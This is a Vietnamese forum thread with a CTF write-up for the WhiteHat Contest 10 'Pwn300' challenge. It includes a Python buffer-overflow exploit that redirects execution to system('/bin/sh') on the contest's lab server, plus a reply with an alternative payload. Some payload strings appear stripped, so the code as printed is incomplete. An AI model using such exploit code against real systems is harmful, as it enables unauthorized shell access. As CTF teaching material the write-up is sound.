[WhiteHat Contest 10] Writeup Pwn300

Tesla123

VIP Members
25/03/2014
7
141 bài viết
[WhiteHat Contest 10] Writeup Pwn300
Bài Pwn300 này không quá khó để khai thác.
Lỗi nằm xảy ra khi parsing 2 tag : và tag . Chi tiết như thế nào, thì các bợn mở ra và reverse lại thì sẽ hiểu :cool:. Và tất nhiên bài này khai thác cũng không quá khó :D.
Mã khai thác của mình:
PHP:
#!/usr/bin/python
from Pwn import *
# from Shellcode import *
p = Pwn(mode=1,host='lab33.wargame.whitehat.vn',port=10300)
def exploit():
      payload = '' + 'A'*127 + '' + '/bin/sh;' + 'C'*120
      payload+= p.pack(0x400A40)[:3] # system
      payload+= ''
      
      p.connect() # ok start to exploit
      p.send(payload)
      p.io() # interact with socket
exploit()
Tải mã khai thác ở đây : https://gist.github.com/peternguyen93/f2e5cd0685dbd3849010.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: [WhiteHat Contest 10] Writeup Pwn300

clgt? như này đơn giản hơn không
PHP:
payload  = ""
payload += "test"
payload += ""
payload += "xfd" * 0x81 + "x0bx40A"
payload += ""
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [WhiteHat Contest 10] Writeup Pwn300

HackersWhoGrill;27144 đã viết:
clgt? như này đơn giản hơn không
PHP:
payload  = ""
payload += "test"
payload += ""
payload += "xfd" * 0x81 + "x0bx40A"
payload += ""
thế có khác gì payload của mình không ? Tào lao
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [WhiteHat Contest 10] Writeup Pwn300

Tesla123;27145 đã viết:
thế có khác gì payload của mình không ? Tào lao


Kém tắm vật :eek:
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: [WhiteHat Contest 10] Writeup Pwn300

HackersWhoGrill;27146 đã viết:
Kém tắm vật :eek:
19896_479097322175838_347746537_n.jpg
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên